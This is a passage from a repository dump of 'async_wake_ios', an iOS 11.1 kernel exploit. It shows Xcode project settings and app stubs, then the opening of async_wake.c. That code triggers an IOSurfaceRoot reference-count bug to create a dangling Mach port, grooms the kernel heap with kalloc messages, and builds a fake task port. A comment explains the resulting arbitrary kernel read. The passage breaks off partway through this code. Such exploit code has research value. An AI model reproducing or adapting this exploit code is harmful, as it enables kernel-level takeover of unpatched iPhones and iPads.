CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 256 | CODE_SIGN_IDENTITY = "iPhone Developer"; 257 | COPY_PHASE_STRIP = NO; 258 | DEBUG_INFORMATION_FORMAT = dwarf; 259 | ENABLE_STRICT_OBJC_MSGSEND = YES; 260 | ENABLE_TESTABILITY = YES; 261 | GCC_C_LANGUAGE_STANDARD = gnu11; 262 | GCC_DYNAMIC_NO_PIC = NO; 263 | GCC_NO_COMMON_BLOCKS = YES; 264 | GCC_OPTIMIZATION_LEVEL = 0; 265 | GCC_PREPROCESSOR_DEFINITIONS = ( 266 | "DEBUG=1", 267 | "$(inherited)", 268 | ); 269 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 270 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 271 | GCC_WARN_UNDECLARED_SELECTOR = YES; 272 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 273 | GCC_WARN_UNUSED_FUNCTION = YES; 274 | GCC_WARN_UNUSED_VARIABLE = YES; 275 | IPHONEOS_DEPLOYMENT_TARGET = 11.1; 276 | MTL_ENABLE_DEBUG_INFO = YES; 277 | ONLY_ACTIVE_ARCH = YES; 278 | SDKROOT = iphoneos; 279 | }; 280 | name = Debug; 281 | }; 282 | B07A024E1FB09B6F0018ACE5 /* Release */ = { 283 | isa = XCBuildConfiguration; 284 | buildSettings = { 285 | ALWAYS_SEARCH_USER_PATHS = NO; 286 | CLANG_ANALYZER_NONNULL = YES; 287 | CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE; 288 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++14"; 289 | CLANG_CXX_LIBRARY = "libc++"; 290 | CLANG_ENABLE_MODULES = YES; 291 | CLANG_ENABLE_OBJC_ARC = YES; 292 | CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES; 293 | CLANG_WARN_BOOL_CONVERSION = YES; 294 | CLANG_WARN_COMMA = YES; 295 | CLANG_WARN_CONSTANT_CONVERSION = YES; 296 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 297 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 298 | CLANG_WARN_EMPTY_BODY = YES; 299 | CLANG_WARN_ENUM_CONVERSION = YES; 300 | CLANG_WARN_INFINITE_RECURSION = YES; 301 | CLANG_WARN_INT_CONVERSION = YES; 302 | CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES; 303 | CLANG_WARN_OBJC_LITERAL_CONVERSION = YES; 304 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 305 | CLANG_WARN_RANGE_LOOP_ANALYSIS = YES; 306 | CLANG_WARN_STRICT_PROTOTYPES = YES; 307 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 308 | CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE; 309 | CLANG_WARN_UNREACHABLE_CODE = YES; 310 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 311 | CODE_SIGN_IDENTITY = "iPhone Developer"; 312 | COPY_PHASE_STRIP = NO; 313 | DEBUG_INFORMATION_FORMAT = "dwarf-with-dsym"; 314 | ENABLE_NS_ASSERTIONS = NO; 315 | ENABLE_STRICT_OBJC_MSGSEND = YES; 316 | GCC_C_LANGUAGE_STANDARD = gnu11; 317 | GCC_NO_COMMON_BLOCKS = YES; 318 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 319 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 320 | GCC_WARN_UNDECLARED_SELECTOR = YES; 321 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 322 | GCC_WARN_UNUSED_FUNCTION = YES; 323 | GCC_WARN_UNUSED_VARIABLE = YES; 324 | IPHONEOS_DEPLOYMENT_TARGET = 11.1; 325 | MTL_ENABLE_DEBUG_INFO = NO; 326 | SDKROOT = iphoneos; 327 | VALIDATE_PRODUCT = YES; 328 | }; 329 | name = Release; 330 | }; 331 | B07A02501FB09B6F0018ACE5 /* Debug */ = { 332 | isa = XCBuildConfiguration; 333 | buildSettings = { 334 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 335 | CODE_SIGN_STYLE = Automatic; 336 | DEVELOPMENT_TEAM = V6K7HPC3NH; 337 | INFOPLIST_FILE = async_wake_ios/Info.plist; 338 | IPHONEOS_DEPLOYMENT_TARGET = 11.0; 339 | LD_RUNPATH_SEARCH_PATHS = "$(inherited) @executable_path/Frameworks"; 340 | OTHER_LDFLAGS = ( 341 | "-framework", 342 | IOKit, 343 | ); 344 | PRODUCT_BUNDLE_IDENTIFIER = "com.example.async-wake-ios1"; 345 | PRODUCT_NAME = "$(TARGET_NAME)"; 346 | TARGETED_DEVICE_FAMILY = "1,2"; 347 | }; 348 | name = Debug; 349 | }; 350 | B07A02511FB09B6F0018ACE5 /* Release */ = { 351 | isa = 
XCBuildConfiguration; 352 | buildSettings = { 353 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 354 | CODE_SIGN_STYLE = Automatic; 355 | DEVELOPMENT_TEAM = V6K7HPC3NH; 356 | INFOPLIST_FILE = async_wake_ios/Info.plist; 357 | IPHONEOS_DEPLOYMENT_TARGET = 11.0; 358 | LD_RUNPATH_SEARCH_PATHS = "$(inherited) @executable_path/Frameworks"; 359 | OTHER_LDFLAGS = ( 360 | "-framework", 361 | IOKit, 362 | ); 363 | PRODUCT_BUNDLE_IDENTIFIER = "com.example.async-wake-ios1"; 364 | PRODUCT_NAME = "$(TARGET_NAME)"; 365 | TARGETED_DEVICE_FAMILY = "1,2"; 366 | }; 367 | name = Release; 368 | }; 369 | /* End XCBuildConfiguration section */ 370 | 371 | /* Begin XCConfigurationList section */ 372 | B07A02341FB09B6F0018ACE5 /* Build configuration list for PBXProject "async_wake_ios" */ = { 373 | isa = XCConfigurationList; 374 | buildConfigurations = ( 375 | B07A024D1FB09B6F0018ACE5 /* Debug */, 376 | B07A024E1FB09B6F0018ACE5 /* Release */, 377 | ); 378 | defaultConfigurationIsVisible = 0; 379 | defaultConfigurationName = Release; 380 | }; 381 | B07A024F1FB09B6F0018ACE5 /* Build configuration list for PBXNativeTarget "async_wake_ios" */ = { 382 | isa = XCConfigurationList; 383 | buildConfigurations = ( 384 | B07A02501FB09B6F0018ACE5 /* Debug */, 385 | B07A02511FB09B6F0018ACE5 /* Release */, 386 | ); 387 | defaultConfigurationIsVisible = 0; 388 | defaultConfigurationName = Release; 389 | }; 390 | /* End XCConfigurationList section */ 391 | }; 392 | rootObject = B07A02311FB09B6F0018ACE5 /* Project object */; 393 | } 394 | -------------------------------------------------------------------------------- /async_wake_ios/AppDelegate.h: -------------------------------------------------------------------------------- 1 | #import 2 | 3 | @interface AppDelegate : UIResponder 4 | 5 | @property (strong, nonatomic) UIWindow *window; 6 | 7 | 8 | @end 9 | 10 | -------------------------------------------------------------------------------- /async_wake_ios/AppDelegate.m: -------------------------------------------------------------------------------- 1 | #import "AppDelegate.h" 2 | #include "async_wake.h" 3 | 4 | @interface AppDelegate () 5 | 6 | @end 7 | 8 | @implementation AppDelegate 9 | 10 | 11 | - (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions { 12 | // Override point for customization after application launch. 13 | //go(); 14 | return YES; 15 | } 16 | 17 | 18 | - (void)applicationWillResignActive:(UIApplication *)application { 19 | // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state. 20 | // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game. 21 | } 22 | 23 | 24 | - (void)applicationDidEnterBackground:(UIApplication *)application { 25 | // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later. 26 | // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits. 
27 | } 28 | 29 | 30 | - (void)applicationWillEnterForeground:(UIApplication *)application { 31 | // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background. 32 | } 33 | 34 | 35 | - (void)applicationDidBecomeActive:(UIApplication *)application { 36 | // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface. 37 | } 38 | 39 | 40 | - (void)applicationWillTerminate:(UIApplication *)application { 41 | // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:. 42 | } 43 | 44 | 45 | @end 46 | -------------------------------------------------------------------------------- /async_wake_ios/Assets.xcassets/AppIcon.appiconset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "iphone", 5 | "size" : "20x20", 6 | "scale" : "2x" 7 | }, 8 | { 9 | "idiom" : "iphone", 10 | "size" : "20x20", 11 | "scale" : "3x" 12 | }, 13 | { 14 | "idiom" : "iphone", 15 | "size" : "29x29", 16 | "scale" : "2x" 17 | }, 18 | { 19 | "idiom" : "iphone", 20 | "size" : "29x29", 21 | "scale" : "3x" 22 | }, 23 | { 24 | "idiom" : "iphone", 25 | "size" : "40x40", 26 | "scale" : "2x" 27 | }, 28 | { 29 | "idiom" : "iphone", 30 | "size" : "40x40", 31 | "scale" : "3x" 32 | }, 33 | { 34 | "idiom" : "iphone", 35 | "size" : "60x60", 36 | "scale" : "2x" 37 | }, 38 | { 39 | "idiom" : "iphone", 40 | "size" : "60x60", 41 | "scale" : "3x" 42 | }, 43 | { 44 | "idiom" : "ipad", 45 | "size" : "20x20", 46 | "scale" : "1x" 47 | }, 48 | { 49 | "idiom" : "ipad", 50 | "size" : "20x20", 51 | "scale" : "2x" 52 | }, 53 | { 54 | "idiom" : "ipad", 55 | "size" : "29x29", 56 | "scale" : "1x" 57 | }, 58 | { 59 | "idiom" : "ipad", 60 | "size" : "29x29", 61 | "scale" : "2x" 62 | }, 63 | { 64 | "idiom" : "ipad", 65 | "size" : "40x40", 66 | "scale" : "1x" 67 | }, 68 | { 69 | "idiom" : "ipad", 70 | "size" : "40x40", 71 | "scale" : "2x" 72 | }, 73 | { 74 | "idiom" : "ipad", 75 | "size" : "76x76", 76 | "scale" : "1x" 77 | }, 78 | { 79 | "idiom" : "ipad", 80 | "size" : "76x76", 81 | "scale" : "2x" 82 | }, 83 | { 84 | "idiom" : "ipad", 85 | "size" : "83.5x83.5", 86 | "scale" : "2x" 87 | }, 88 | { 89 | "idiom" : "ios-marketing", 90 | "size" : "1024x1024", 91 | "scale" : "1x" 92 | } 93 | ], 94 | "info" : { 95 | "version" : 1, 96 | "author" : "xcode" 97 | } 98 | } -------------------------------------------------------------------------------- /async_wake_ios/Base.lproj/LaunchScreen.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /async_wake_ios/Base.lproj/Main.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | -------------------------------------------------------------------------------- /async_wake_ios/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | CFBundleDevelopmentRegion 6 | 
$(DEVELOPMENT_LANGUAGE) 7 | CFBundleExecutable 8 | $(EXECUTABLE_NAME) 9 | CFBundleIdentifier 10 | $(PRODUCT_BUNDLE_IDENTIFIER) 11 | CFBundleInfoDictionaryVersion 12 | 6.0 13 | CFBundleName 14 | $(PRODUCT_NAME) 15 | CFBundlePackageType 16 | APPL 17 | CFBundleShortVersionString 18 | 1.0 19 | CFBundleVersion 20 | 1 21 | LSRequiresIPhoneOS 22 | 23 | UILaunchStoryboardName 24 | LaunchScreen 25 | UIMainStoryboardFile 26 | Main 27 | UIRequiredDeviceCapabilities 28 | 29 | armv7 30 | 31 | UISupportedInterfaceOrientations 32 | 33 | UIInterfaceOrientationPortrait 34 | UIInterfaceOrientationLandscapeLeft 35 | UIInterfaceOrientationLandscapeRight 36 | 37 | UISupportedInterfaceOrientations~ipad 38 | 39 | UIInterfaceOrientationPortrait 40 | UIInterfaceOrientationPortraitUpsideDown 41 | UIInterfaceOrientationLandscapeLeft 42 | UIInterfaceOrientationLandscapeRight 43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /async_wake_ios/ViewController.h: -------------------------------------------------------------------------------- 1 | #import 2 | 3 | @interface ViewController : UIViewController 4 | 5 | @property (weak, nonatomic) IBOutlet UILabel *tfp; 6 | 7 | @end 8 | 9 | -------------------------------------------------------------------------------- /async_wake_ios/ViewController.m: -------------------------------------------------------------------------------- 1 | #import "ViewController.h" 2 | #include 3 | #include "async_wake.h" 4 | 5 | @interface ViewController () 6 | 7 | @end 8 | 9 | @implementation ViewController 10 | 11 | - (void)viewDidLoad { 12 | [super viewDidLoad]; 13 | // Do any additional setup after loading the view, typically from a nib. 14 | self.tfp.text = [NSString stringWithFormat:@"tfp: %x", go()]; 15 | } 16 | 17 | 18 | - (void)didReceiveMemoryWarning { 19 | printf("******* received memory warning! ***********\n"); 20 | [super didReceiveMemoryWarning]; 21 | // Dispose of any resources that can be recreated. 
22 | } 23 | 24 | 25 | @end 26 | -------------------------------------------------------------------------------- /async_wake_ios/arm64_state.h: -------------------------------------------------------------------------------- 1 | #ifndef arm64_state_h 2 | #define arm64_state_h 3 | 4 | /* 5 | * GPR context 6 | */ 7 | 8 | struct arm_saved_state32 { 9 | uint32_t r[13]; /* General purpose register r0-r12 */ 10 | uint32_t sp; /* Stack pointer r13 */ 11 | uint32_t lr; /* Link register r14 */ 12 | uint32_t pc; /* Program counter r15 */ 13 | uint32_t cpsr; /* Current program status register */ 14 | uint32_t far; /* Virtual fault address */ 15 | uint32_t esr; /* Exception syndrome register */ 16 | uint32_t exception; /* Exception number */ 17 | }; 18 | typedef struct arm_saved_state32 arm_saved_state32_t; 19 | 20 | struct arm_saved_state32_tagged { 21 | uint32_t tag; 22 | struct arm_saved_state32 state; 23 | }; 24 | typedef struct arm_saved_state32_tagged arm_saved_state32_tagged_t; 25 | 26 | #define ARM_SAVED_STATE32_COUNT ((mach_msg_type_number_t) \ 27 | (sizeof (arm_saved_state32_t)/sizeof(unsigned int))) 28 | 29 | struct arm_saved_state64 { 30 | uint64_t x[29]; /* General purpose registers x0-x28 */ 31 | uint64_t fp; /* Frame pointer x29 */ 32 | uint64_t lr; /* Link register x30 */ 33 | uint64_t sp; /* Stack pointer x31 */ 34 | uint64_t pc; /* Program counter */ 35 | uint32_t cpsr; /* Current program status register */ 36 | uint32_t reserved; /* Reserved padding */ 37 | uint64_t far; /* Virtual fault address */ 38 | uint32_t esr; /* Exception syndrome register */ 39 | uint32_t exception; /* Exception number */ 40 | }; 41 | typedef struct arm_saved_state64 arm_saved_state64_t; 42 | 43 | #define ARM_SAVED_STATE64_COUNT ((mach_msg_type_number_t) \ 44 | (sizeof (arm_saved_state64_t)/sizeof(unsigned int))) 45 | 46 | struct arm_saved_state { 47 | arm_state_hdr_t ash; 48 | union { 49 | struct arm_saved_state32 ss_32; 50 | struct arm_saved_state64 ss_64; 51 | } uss; 52 | } __attribute__((aligned(16))); 53 | #define ss_32 uss.ss_32 54 | #define ss_64 uss.ss_64 55 | 56 | typedef struct arm_saved_state arm_saved_state_t; 57 | 58 | /* 59 | * NEON context 60 | */ 61 | typedef __uint128_t uint128_t; 62 | typedef uint64_t uint64x2_t __attribute__((ext_vector_type(2))); 63 | typedef uint32_t uint32x4_t __attribute__((ext_vector_type(4))); 64 | 65 | struct arm_neon_saved_state32 { 66 | union { 67 | uint128_t q[16]; 68 | uint64_t d[32]; 69 | uint32_t s[32]; 70 | } v; 71 | uint32_t fpsr; 72 | uint32_t fpcr; 73 | }; 74 | typedef struct arm_neon_saved_state32 arm_neon_saved_state32_t; 75 | 76 | #define ARM_NEON_SAVED_STATE32_COUNT ((mach_msg_type_number_t) \ 77 | (sizeof (arm_neon_saved_state32_t)/sizeof(unsigned int))) 78 | 79 | struct arm_neon_saved_state64 { 80 | union { 81 | uint128_t q[32]; 82 | uint64x2_t d[32]; 83 | uint32x4_t s[32]; 84 | } v; 85 | uint32_t fpsr; 86 | uint32_t fpcr; 87 | }; 88 | typedef struct arm_neon_saved_state64 arm_neon_saved_state64_t; 89 | 90 | #define ARM_NEON_SAVED_STATE64_COUNT ((mach_msg_type_number_t) \ 91 | (sizeof (arm_neon_saved_state64_t)/sizeof(unsigned int))) 92 | 93 | struct arm_neon_saved_state { 94 | arm_state_hdr_t nsh; 95 | union { 96 | struct arm_neon_saved_state32 ns_32; 97 | struct arm_neon_saved_state64 ns_64; 98 | } uns; 99 | }; 100 | typedef struct arm_neon_saved_state arm_neon_saved_state_t; 101 | #define ns_32 uns.ns_32 102 | #define ns_64 uns.ns_64 103 | 104 | struct arm_context { 105 | struct arm_saved_state ss; 106 | struct arm_neon_saved_state ns; 107 | }; 
108 | typedef struct arm_context arm_context_t; 109 | 110 | #define ARM_SAVED_STATE64 0x15 111 | 112 | #define ARM_DEBUG_STATE64 15 113 | const uint64_t ACT_DEBUGDATA_OFFSET = 0x438; 114 | 115 | struct arm64_debug_state 116 | { 117 | __uint64_t bvr[16]; 118 | __uint64_t bcr[16]; 119 | __uint64_t wvr[16]; 120 | __uint64_t wcr[16]; 121 | __uint64_t mdscr_el1; /* Bit 0 is SS (Hardware Single Step) */ 122 | }; 123 | 124 | struct arm_debug_aggregate_state { 125 | arm_state_hdr_t dsh; 126 | struct arm64_debug_state ds64; 127 | } __attribute__((aligned(16))); 128 | 129 | 130 | 131 | #endif 132 | -------------------------------------------------------------------------------- /async_wake_ios/async_wake.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | 13 | #include 14 | 15 | #include 16 | 17 | #include "async_wake.h" 18 | #include "kmem.h" 19 | #include "find_port.h" 20 | #include "kutils.h" 21 | #include "symbols.h" 22 | #include "early_kalloc.h" 23 | #include "kcall.h" 24 | #include "kdbg.h" 25 | 26 | // various prototypes and structure definitions for missing iOS headers: 27 | 28 | kern_return_t mach_vm_read( 29 | vm_map_t target_task, 30 | mach_vm_address_t address, 31 | mach_vm_size_t size, 32 | vm_offset_t *data, 33 | mach_msg_type_number_t *dataCnt); 34 | 35 | /****** IOKit/IOKitLib.h *****/ 36 | typedef mach_port_t io_service_t; 37 | typedef mach_port_t io_connect_t; 38 | 39 | extern const mach_port_t kIOMasterPortDefault; 40 | #define IO_OBJECT_NULL (0) 41 | 42 | kern_return_t 43 | IOConnectCallAsyncMethod( 44 | mach_port_t connection, 45 | uint32_t selector, 46 | mach_port_t wakePort, 47 | uint64_t* reference, 48 | uint32_t referenceCnt, 49 | const uint64_t* input, 50 | uint32_t inputCnt, 51 | const void* inputStruct, 52 | size_t inputStructCnt, 53 | uint64_t* output, 54 | uint32_t* outputCnt, 55 | void* outputStruct, 56 | size_t* outputStructCntP); 57 | 58 | kern_return_t 59 | IOConnectCallMethod( 60 | mach_port_t connection, 61 | uint32_t selector, 62 | const uint64_t* input, 63 | uint32_t inputCnt, 64 | const void* inputStruct, 65 | size_t inputStructCnt, 66 | uint64_t* output, 67 | uint32_t* outputCnt, 68 | void* outputStruct, 69 | size_t* outputStructCntP); 70 | 71 | io_service_t 72 | IOServiceGetMatchingService( 73 | mach_port_t _masterPort, 74 | CFDictionaryRef matching); 75 | 76 | CFMutableDictionaryRef 77 | IOServiceMatching( 78 | const char* name); 79 | 80 | kern_return_t 81 | IOServiceOpen( 82 | io_service_t service, 83 | task_port_t owningTask, 84 | uint32_t type, 85 | io_connect_t* connect ); 86 | 87 | 88 | /******** end extra headers ***************/ 89 | 90 | mach_port_t user_client = MACH_PORT_NULL; 91 | 92 | // make_dangling will drop an extra reference on port 93 | // this is the actual bug: 94 | void make_dangling(mach_port_t port) { 95 | kern_return_t err; 96 | 97 | uint64_t inputScalar[16]; 98 | uint32_t inputScalarCnt = 0; 99 | 100 | char inputStruct[4096]; 101 | size_t inputStructCnt = 0x18; 102 | 103 | uint64_t* ivals = (uint64_t*)inputStruct; 104 | ivals[0] = 1; 105 | ivals[1] = 2; 106 | ivals[2] = 3; 107 | 108 | uint64_t outputScalar[16]; 109 | uint32_t outputScalarCnt = 0; 110 | 111 | char outputStruct[4096]; 112 | size_t outputStructCnt = 0; 113 | 114 | mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND); 115 | 116 | uint64_t reference[8] = {0}; 117 | uint32_t 
referenceCnt = 1; 118 | 119 | for (int i = 0; i < 2; i++) { 120 | err = IOConnectCallAsyncMethod( 121 | user_client, 122 | 17, // s_set_surface_notify 123 | port, 124 | reference, 125 | referenceCnt, 126 | inputScalar, 127 | inputScalarCnt, 128 | inputStruct, 129 | inputStructCnt, 130 | outputScalar, 131 | &outputScalarCnt, 132 | outputStruct, 133 | &outputStructCnt); 134 | 135 | printf("%x\n", err); 136 | }; 137 | 138 | err = IOConnectCallMethod( 139 | user_client, 140 | 18, // s_remove_surface_notify 141 | inputScalar, 142 | inputScalarCnt, 143 | inputStruct, 144 | inputStructCnt, 145 | outputScalar, 146 | &outputScalarCnt, 147 | outputStruct, 148 | &outputStructCnt); 149 | 150 | printf("%x\n", err); 151 | } 152 | 153 | void prepare_user_client() { 154 | kern_return_t err; 155 | io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOSurfaceRoot")); 156 | 157 | if (service == IO_OBJECT_NULL){ 158 | printf(" [-] unable to find service\n"); 159 | exit(EXIT_FAILURE); 160 | } 161 | 162 | err = IOServiceOpen(service, mach_task_self(), 0, &user_client); 163 | if (err != KERN_SUCCESS){ 164 | printf(" [-] unable to get user client connection\n"); 165 | exit(EXIT_FAILURE); 166 | } 167 | 168 | printf("got user client: 0x%x\n", user_client); 169 | } 170 | 171 | mach_port_t* prepare_ports(int n_ports) { 172 | mach_port_t* ports = malloc(n_ports * sizeof(mach_port_t)); 173 | for (int i = 0; i < n_ports; i++) { 174 | kern_return_t err; 175 | err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &ports[i]); 176 | if (err != KERN_SUCCESS) { 177 | printf(" [-] failed to allocate port\n"); 178 | exit(EXIT_FAILURE); 179 | } 180 | } 181 | return ports; 182 | } 183 | 184 | void free_ports(mach_port_t* ports, int n_ports) { 185 | for (int i = 0; i < n_ports; i++) { 186 | mach_port_t port = ports[i]; 187 | if (port == MACH_PORT_NULL) { 188 | continue; 189 | } 190 | 191 | mach_port_destroy(mach_task_self(), port); 192 | } 193 | } 194 | 195 | struct simple_msg { 196 | mach_msg_header_t hdr; 197 | char buf[0]; 198 | }; 199 | 200 | mach_port_t send_kalloc_message(uint8_t* replacer_message_body, uint32_t replacer_body_size) { 201 | // allocate a port to send the messages to 202 | mach_port_t q = MACH_PORT_NULL; 203 | kern_return_t err; 204 | err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &q); 205 | if (err != KERN_SUCCESS) { 206 | printf(" [-] failed to allocate port\n"); 207 | exit(EXIT_FAILURE); 208 | } 209 | 210 | mach_port_limits_t limits = {0}; 211 | limits.mpl_qlimit = MACH_PORT_QLIMIT_LARGE; 212 | err = mach_port_set_attributes(mach_task_self(), 213 | q, 214 | MACH_PORT_LIMITS_INFO, 215 | (mach_port_info_t)&limits, 216 | MACH_PORT_LIMITS_INFO_COUNT); 217 | if (err != KERN_SUCCESS) { 218 | printf(" [-] failed to increase queue limit\n"); 219 | exit(EXIT_FAILURE); 220 | } 221 | 222 | 223 | mach_msg_size_t msg_size = sizeof(struct simple_msg) + replacer_body_size; 224 | struct simple_msg* msg = malloc(msg_size); 225 | memset(msg, 0, sizeof(struct simple_msg)); 226 | memcpy(&msg->buf[0], replacer_message_body, replacer_body_size); 227 | 228 | for (int i = 0; i < 256; i++) { // was MACH_PORT_QLIMIT_LARGE 229 | msg->hdr.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0); 230 | msg->hdr.msgh_size = msg_size; 231 | msg->hdr.msgh_remote_port = q; 232 | msg->hdr.msgh_local_port = MACH_PORT_NULL; 233 | msg->hdr.msgh_id = 0x41414142; 234 | 235 | err = mach_msg(&msg->hdr, 236 | MACH_SEND_MSG|MACH_MSG_OPTION_NONE, 237 | msg_size, 238 | 0, 239 | 
MACH_PORT_NULL, 240 | MACH_MSG_TIMEOUT_NONE, 241 | MACH_PORT_NULL); 242 | 243 | if (err != KERN_SUCCESS) { 244 | printf(" [-] failed to send message %x (%d): %s\n", err, i, mach_error_string(err)); 245 | exit(EXIT_FAILURE); 246 | } 247 | } 248 | 249 | return q; 250 | } 251 | 252 | /* 253 | for the given mach message size, how big will the ipc_kmsg structure be? 254 | 255 | This is defined in ipc_kmsg_alloc, and it's quite complicated to work it out! 256 | 257 | The size is overallocated so that if the message was sent from a 32-bit process 258 | they can expand out the 32-bit ool descriptors to the kernel's 64-bit ones, which 259 | means that for each descriptor they would need an extra 4 bytes of space for the 260 | larger pointer. Except at this point they have no idea what's in the message 261 | so they assume the worst case for all messages. This leads to approximately a 30% 262 | overhead in the allocation size. 263 | 264 | The allocated size also contains space for the maximum trailer plus the ipc_kmsg header. 265 | 266 | When the message is actually written into this buffer it's aligned to the end 267 | */ 268 | int message_size_for_kalloc_size(int kalloc_size) { 269 | return ((3*kalloc_size)/4) - 0x74; 270 | } 271 | 272 | 273 | /* 274 | build a fake task port object to get an arbitrary read 275 | 276 | I am basing this on the techniques used in Yalu 10.2 released by 277 | @qwertyoruiopz and @marcograss (and documented by Johnathan Levin 278 | in *OS Internals Volume III) 279 | 280 | There are a few difference here. We have a kernel memory disclosure bug so 281 | we know the address the dangling port pointer points to. This means we don't need 282 | to point the task to userspace to get a "what+where" primitive since we can just 283 | put whatever recursive structure we require in the object which will replace 284 | the free'd port. 285 | 286 | We can also leverage the fact that we have a dangling mach port pointer 287 | to also write to a small area of the dangling port (via mach_port_set_context) 288 | 289 | If we build the replacement object (with the fake struct task) 290 | correctly we can set it up such that by calling mach_port_set_context we can control 291 | where the arbitrary read will read from. 292 | 293 | this same method is used again a second time once the arbitrary read works so that the vm_map 294 | and receiver can be set correctly turning this into a fake kernel task port. 
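(rough sketch of the resulting read primitive, to make the above concrete: the replacement object types the dangling port as IKOT_TASK and points its ip_kobject at a fake struct task laid out so that task->bsd_info overlaps the port's ip_context field; since mach_port_set_context() lets us rewrite ip_context from userspace, setting the context to (target_address - the p_pid offset in struct proc) and then asking for the fake task's pid, e.g. via pid_for_task(), returns the 4 bytes at target_address, giving a repeatable 32-bit read)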
295 | */ 296 | 297 | uint32_t IO_BITS_ACTIVE = 0x80000000; 298 | uint32_t IKOT_TASK = 2; 299 | uint32_t IKOT_NONE = 0; 300 | 301 | uint64_t second_port_initial_context = 0x1024204110244201; 302 | 303 | uint8_t* build_message_payload(uint64_t dangling_port_address, uint32_t message_body_size, uint32_t message_body_offset, uint64_t vm_map, uint64_t receiver, uint64_t** context_ptr) { 304 | uint8_t* body = malloc(message_body_size); 305 | memset(body, 0, message_body_size); 306 | 307 | uint32_t port_page_offset = dangling_port_address & 0xfff; 308 | 309 | // structure required for the first fake port: 310 | uint8_t* fake_port = body + (port_page_offset - message_body_offset); 311 | 312 | 313 | *(uint32_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS)) = IO_BITS_ACTIVE | IKOT_TASK; 314 | *(uint32_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES)) = 0xf00d; // leak references 315 | *(uint32_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS)) = 0xf00d; // leak srights 316 | *(uint64_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER)) = receiver; 317 | *(uint64_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT)) = 0x123456789abcdef; 318 | 319 | *context_ptr = (uint64_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT)); 320 | 321 | 322 | // set the kobject pointer such that task->bsd_info reads from ip_context: 323 | int fake_task_offset = koffset(KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT) - koffset(KSTRUCT_OFFSET_TASK_BSD_INFO); 324 | 325 | uint64_t fake_task_address = dangling_port_address + fake_task_offset; 326 | *(uint64_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)) = fake_task_address; 327 | 328 | 329 | // when we looked for a port to make dangling we made sure it was correctly positioned on the page such that when we set the fake task 330 | // pointer up there it's actually all in the buffer so we can also set the reference count to leak it, let's double check that! 
